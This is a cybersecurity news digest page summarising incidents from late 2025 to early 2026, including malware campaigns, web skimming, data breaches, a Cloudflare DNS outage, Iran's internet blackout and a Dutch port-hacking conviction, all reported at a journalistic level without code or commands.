All news in category “Incidents and Data Breaches”

⚠️ On January 8, 2026, a memory-optimizing change to Cloudflare’s 1.1.1.1 resolver inadvertently reordered DNS answer records, placing CNAMEs after final A/AAAA answers and triggering widespread resolution failures. The bug primarily affected clients that parse answers sequentially—most notably glibc getaddrinfo and certain Cisco switch firmware—resulting in failed lookups and reboot loops in some devices. Cloudflare reverted the change promptly and has drafted an IETF Internet‑Draft to clarify expected answer ordering.

🔒 Between October and December 2025, Ukraine's Defense Forces were targeted in a charity-themed messaging campaign that delivered the backdoor PluggyApe. Attackers used Signal and WhatsApp to lure recipients to fake charity sites or to send password-protected archives containing executable .docx.pif files created with PyInstaller, and sometimes delivered payloads directly via messaging apps. PluggyApe profiles hosts, sends victim identifiers and system data to operators, achieves persistence through Windows Registry modifications, and fetches base64-encoded C2 addresses from public paste services. CERT-UA assigns medium confidence attribution to the Russian-aligned group known as Laundry Bear (aka Void Blizzard) and warns that mobile devices and compromised local accounts make such lures especially convincing.

🛡️ Central Maine Healthcare disclosed a security incident after discovering unauthorized access to its systems between March 19 and June 1, 2025. The investigation, completed on November 6, 2025, determined that 145,381 individuals — including patients and current or former employees — may have had sensitive information exposed. Exposed data types vary by person and can include full names, dates of birth, treatment and service details, provider names, health insurance information, and Social Security Numbers. CMH has begun notifying affected individuals, is offering free credit monitoring, and has set up a dedicated patient support line to answer questions and accept reports of potential data misuse.

🔒 Belgian hospital AZ Monica disconnected all servers at 6:32 AM after a cyberattack that forced the cancellation of scheduled procedures and slowed emergency operations. The Emergency Department is operating at reduced capacity and MUG and PIT services are currently offline; seven critical patients were transferred to other hospitals. The hospital has notified authorities and is monitoring the situation while staff rely on paper records; officials have not confirmed whether ransomware was involved.

🔒 This article examines how NFC relay attacks built on the open-source NFCGate tool have been adapted by criminals to steal funds via smartphone payments. It describes both the original direct relay—where a victim’s phone reads their card and relays data to a mule—and the newer reverse relay that causes victims to unknowingly emulate an attacker’s card. The author outlines documented campaigns from 2023–2025, malware families involved, and practical precautions to reduce risk.

🔒 Silent Push researchers disclosed a long-running web skimming campaign active since January 2022 that targets customers of major payment networks including American Express, Mastercard, Discover, JCB, Diners Club and UnionPay. The attackers deliver highly obfuscated JavaScript from the domain cdn-cookie[.]com to e-commerce sites and use checks for WordPress’s wpadminbar to self‑destruct when administrators are present. The skimmer renders a fake Stripe payment form, harvests card and personal data, exfiltrates it to lasorie[.]com, then erases traces and sets a localStorage flag to prevent repeat infections, heightening risk for enterprise clients of affected payment providers.

⚠ A malicious Chrome extension named MEXC API Automator (ID: pppdfgkfdemgfknfnhpkibbkabhghhfh) has been found on the Chrome Web Store and is designed to create and steal API keys for the MEXC exchange. Published Sept 1, 2025 by a developer using the handle "jorjortan142," the add-on programmatically generates API keys with withdrawal permissions and hides the enabled permission in the UI. The extension injects a content script on MEXC's API management page, captures the Access and Secret keys when created, and exfiltrates them via HTTPS to a hard-coded Telegram bot. Socket researcher Kirill Boychenko reported 29 downloads and warns the threat remains active as long as stolen keys are valid.

🔒 Betterment confirmed a breach after an attacker used a third-party marketing platform to send fraudulent crypto reward emails to a subset of customers on January 9. The messages, sent from the legitimate subdomain address 'support@e.betterment.com', claimed to triple Bitcoin and Ethereum deposits and included wallet addresses and large deposit deadlines. The actor accessed customer contact data (names, emails, physical addresses, phone numbers, dates of birth) but did not access customer accounts or expose account credentials. Betterment removed the unauthorized access, warned customers, and said it will publish a post-mortem while strengthening defenses against social engineering.

🔎 A multi-stage Windows malware campaign, tracked as SHADOW#REACTOR, uses obfuscated VBS and heavily encoded PowerShell to stage payloads entirely in memory and avoid disk-based indicators. Attackers fetch repeated text-based fragments over HTTP, reconstruct them into a reflectively loaded .NET assembly protected with .NET Reactor, and abuse signed Microsoft binaries such as MSBuild.exe to execute the final Remcos RAT. The chain emphasizes living-off-the-land techniques, persistence and anti-analysis measures to complicate detection.

⚠️ Scammers are targeting LinkedIn with fake comment replies that impersonate the platform and falsely warn users of policy violations or temporary account restrictions. The malicious replies sometimes use LinkedIn’s lnkd.in shortener or obscure .app domains to hide phishing destinations and present convincing link previews. Victims who click are directed to credential-harvesting pages that request identity verification. LinkedIn says it is aware and is taking action; members should report suspicious comments.

⚠️ Recent analyses show ransomware groups increasingly threaten victims by reporting alleged regulatory breaches to authorities, adding a compliance layer to the familiar double-extortion model. Researchers at Akamai observed this tactic over the past two years, citing groups such as Anubis and Ransomhub. Attackers target industries with high compliance risk and use AI to rapidly identify and craft legally framed complaints under GDPR, DORA and tightened SEC rules.

🔒 Cybercriminals are increasingly using browser-in-the-browser (BitB) attacks to harvest Facebook credentials, researchers at Trellix report. Attackers distribute phishing emails with spoofed, shortened links and present a fake in-browser pop-up that mimics the Facebook login — even hardcoding the real Facebook URL and displaying a bogus CAPTCHA to boost credibility. Victims are prompted for personal details and then asked to confirm their password; enabling two-factor authentication and avoiding embedded links can mitigate these scams.

🔎 Check Point Research has identified a modular Linux malware framework, VoidLink, linked to Chinese-speaking developers and designed to target cloud and container environments. The framework includes custom loaders, implants, rootkits and over 30 plugins supporting reconnaissance, lateral movement, persistence and anti-forensic techniques. It detects AWS, GCP, Azure, Alibaba and Tencent and can enumerate containers, hypervisors and orchestration platforms. No live infections have been confirmed, but documentation suggests commercial intent and active development.

🔒 Multiple current and former Target employees confirmed that source code and documentation shared by a threat actor match the company's internal systems. The leaked sample contains real system names (e.g., BigRED, TAP [Provisioning]), proprietary codenames and tooling references, including Vela-based CI/CD and JFrog Artifactory. Target enacted an "accelerated" change restricting access to its on-prem Git server to the corporate network and VPN after the disclosure.

🔒 Multiple current and former Target employees told BleepingComputer that a sample of source code and documentation published by a threat actor matches real internal systems. A screenshot of company-wide Slack shows an "accelerated" security change effective January 9, 2026, restricting access to git.target.com to Target-managed networks or VPN. The 14MB sample contains internal names like "BigRED" and "TAP" and references to Vela, Hadoop datasets, and JFrog Artifactory. The threat actor claims a full archive of ~860GB; the root cause remains under investigation.

🔒 Silent Push has uncovered a long-running Magecart web‑skimming campaign, active since around 2022, that loads highly obfuscated JavaScript from bulletproof hosting and targets six major card networks including American Express, Mastercard and UnionPay. The skimmer operates client-side, injecting an iframe to display a convincingly styled fake payment form that captures cardholder and shipping details before restoring the original form. Silent Push links parts of the infrastructure to domains hosted by a sanctioned/bulletproof provider and recommends measures such as Content Security Policy, PCI DSS adherence, timely CMS/plugin updates, enforced MFA and incognito-mode testing to detect stealthy injections.

🔓 On January 9, 2026, a database containing 323,986 BreachForums user records was published on a site named after the ShinyHunters gang, exposing usernames, email addresses, password hashes and IP addresses. The leak was accompanied by a roughly 4,400‑word manifesto from someone calling themselves "James", who names alleged cybercriminals and claims responsibility. The provenance and motive remain unclear, though the dump could provide law enforcement with investigative leads and highlights the limits of perceived anonymity on criminal forums.

🔍Researchers described a newly observed SHADOW#REACTOR campaign that uses an evasive, multi-stage chain to deliver the commercial Remcos RAT and maintain covert persistence. An obfuscated win64.vbs launcher invokes a Base64 PowerShell stager that retrieves fragmented, text-only payloads and reconstructs loaders in memory using a .NET Reactor–protected reflective assembly. The final stage abuses MSBuild.exe to execute the Remcos backdoor, and wrapper scripts ensure re-execution, all designed to frustrate detection and analysis.

🌐 Cloudflare observed a near-total Internet blackout in Iran beginning on January 8, 2026, as national traffic fell to effectively zero in a matter of hours. Measured indicators included a 98.5% reduction in announced IPv6 address space and rapid losses at major providers such as MCCI, IranCell, and TCI. Brief, localized restorations — including access to Cloudflare’s 1.1.1.1 resolver and several university networks — were transient. Cloudflare continues to monitor the situation through Cloudflare Radar and will report updates.

🔒 The Amsterdam Court of Appeal sentenced a 44‑year‑old Dutch national to seven years in prison for breaching IT systems at the ports of Rotterdam, Barendrecht and Antwerp to facilitate drug trafficking. The court found he gained access after employees introduced USB sticks containing malware, enabling installation of a remote access tool, data exfiltration and interception. An appeal arguing unlawful interception of Sky ECC communications was rejected, as the defence failed to substantiate procedural violations. He was acquitted on one large cocaine import charge but upheld on hacking, facilitating the importation of 210 kg of cocaine, and attempted extortion.